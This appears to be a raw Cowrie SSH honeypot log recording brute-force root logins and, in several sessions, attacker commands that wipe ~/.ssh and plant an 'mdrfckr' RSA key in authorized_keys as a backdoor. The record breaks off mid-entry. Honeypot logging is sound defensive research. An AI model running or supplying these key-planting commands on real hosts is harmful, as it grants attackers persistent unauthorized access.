{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:21:20.264584Z","src_ip":"185.152.45.241","session":"ef810925d2ea"}
{"eventid":"cowrie.login.failed","username":"proradis","password":"liverovast#adkz443","message":"login attempt [proradis/liverovast#adkz443] failed","sensor":"my-vps","timestamp":"2025-09-09T02:21:20.504985Z","src_ip":"185.152.45.241","session":"ef810925d2ea"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:21:21.560250Z","src_ip":"185.152.45.241","session":"ef810925d2ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49200,"dst_ip":"1.2.3.4","dst_port":22,"session":"4963c7ab58ce","protocol":"ssh","message":"New connection: 212.227.235.229:49200 (1.2.3.4:22) [session: 4963c7ab58ce]","sensor":"my-vps","timestamp":"2025-09-09T02:21:43.118416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:21:43.125103Z","src_ip":"212.227.235.229","session":"4963c7ab58ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:21:43.499513Z","src_ip":"212.227.235.229","session":"4963c7ab58ce"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"P@ssw0rd","message":"login attempt [elastic/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T02:21:45.009370Z","src_ip":"212.227.235.229","session":"4963c7ab58ce"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:21:46.397123Z","src_ip":"212.227.235.229","session":"4963c7ab58ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34280,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c12865400b0","protocol":"ssh","message":"New connection: 212.227.235.229:34280 (1.2.3.4:22) [session: 6c12865400b0]","sensor":"my-vps","timestamp":"2025-09-09T02:21:48.589620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:21:48.590576Z","src_ip":"212.227.235.229","session":"6c12865400b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:21:48.675549Z","src_ip":"212.227.235.229","session":"6c12865400b0"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1234!","message":"login attempt [root/Password1234!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:21:49.055890Z","src_ip":"212.227.235.229","session":"6c12865400b0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:21:49.241208Z","src_ip":"212.227.235.229","session":"6c12865400b0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:21:49.241922Z","src_ip":"212.227.235.229","session":"6c12865400b0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:21:49.243120Z","src_ip":"212.227.235.229","session":"6c12865400b0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:21:49.328918Z","src_ip":"212.227.235.229","session":"6c12865400b0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:21:49.622303Z","src_ip":"212.227.235.229","session":"6c12865400b0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:21:49.622992Z","src_ip":"212.227.235.229","session":"6c12865400b0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:21:49.709341Z","src_ip":"212.227.235.229","session":"6c12865400b0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:21:49.710227Z","src_ip":"212.227.235.229","session":"6c12865400b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34284,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e14a5501130","protocol":"ssh","message":"New connection: 212.227.235.229:34284 (1.2.3.4:22) [session: 5e14a5501130]","sensor":"my-vps","timestamp":"2025-09-09T02:21:49.794702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:21:49.795615Z","src_ip":"212.227.235.229","session":"5e14a5501130"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:21:49.881754Z","src_ip":"212.227.235.229","session":"5e14a5501130"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:21:50.268192Z","src_ip":"212.227.235.229","session":"5e14a5501130"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:21:51.357194Z","src_ip":"212.227.235.229","session":"5e14a5501130"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55214,"dst_ip":"1.2.3.4","dst_port":22,"session":"450979aabeb5","protocol":"ssh","message":"New connection: 212.227.235.229:55214 (1.2.3.4:22) [session: 450979aabeb5]","sensor":"my-vps","timestamp":"2025-09-09T02:21:51.440018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:21:51.441122Z","src_ip":"212.227.235.229","session":"450979aabeb5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:21:51.524956Z","src_ip":"212.227.235.229","session":"450979aabeb5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:21:51.900666Z","src_ip":"212.227.235.229","session":"450979aabeb5"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:21:51.986161Z","src_ip":"212.227.235.229","session":"6c12865400b0"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:21:51.987012Z","src_ip":"212.227.235.229","session":"450979aabeb5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42100,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c39a089da65","protocol":"ssh","message":"New connection: 212.227.235.229:42100 (1.2.3.4:22) [session: 5c39a089da65]","sensor":"my-vps","timestamp":"2025-09-09T02:21:54.218761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:21:54.219756Z","src_ip":"212.227.235.229","session":"5c39a089da65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:21:54.520941Z","src_ip":"212.227.235.229","session":"5c39a089da65"}
{"eventid":"cowrie.login.failed","username":"debian","password":"qwerty","message":"login attempt [debian/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T02:21:55.759006Z","src_ip":"212.227.235.229","session":"5c39a089da65"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:21:57.061865Z","src_ip":"212.227.235.229","session":"5c39a089da65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44498,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e224ce6240f","protocol":"ssh","message":"New connection: 212.227.235.229:44498 (1.2.3.4:22) [session: 7e224ce6240f]","sensor":"my-vps","timestamp":"2025-09-09T02:22:02.244719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:22:02.250384Z","src_ip":"212.227.235.229","session":"7e224ce6240f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:22:02.494755Z","src_ip":"212.227.235.229","session":"7e224ce6240f"}
{"eventid":"cowrie.login.success","username":"root","password":"Ll123456789","message":"login attempt [root/Ll123456789] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:22:03.497413Z","src_ip":"212.227.235.229","session":"7e224ce6240f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:22:04.015486Z","src_ip":"212.227.235.229","session":"7e224ce6240f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:22:04.016739Z","src_ip":"212.227.235.229","session":"7e224ce6240f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:22:04.017982Z","src_ip":"212.227.235.229","session":"7e224ce6240f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:22:04.275586Z","src_ip":"212.227.235.229","session":"7e224ce6240f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:22:04.881351Z","src_ip":"212.227.235.229","session":"7e224ce6240f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:22:04.882122Z","src_ip":"212.227.235.229","session":"7e224ce6240f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:22:05.134278Z","src_ip":"212.227.235.229","session":"7e224ce6240f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:22:05.135164Z","src_ip":"212.227.235.229","session":"7e224ce6240f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45114,"dst_ip":"1.2.3.4","dst_port":22,"session":"de28e9ef8edc","protocol":"ssh","message":"New connection: 212.227.235.229:45114 (1.2.3.4:22) [session: de28e9ef8edc]","sensor":"my-vps","timestamp":"2025-09-09T02:22:05.381202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:22:05.382184Z","src_ip":"212.227.235.229","session":"de28e9ef8edc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@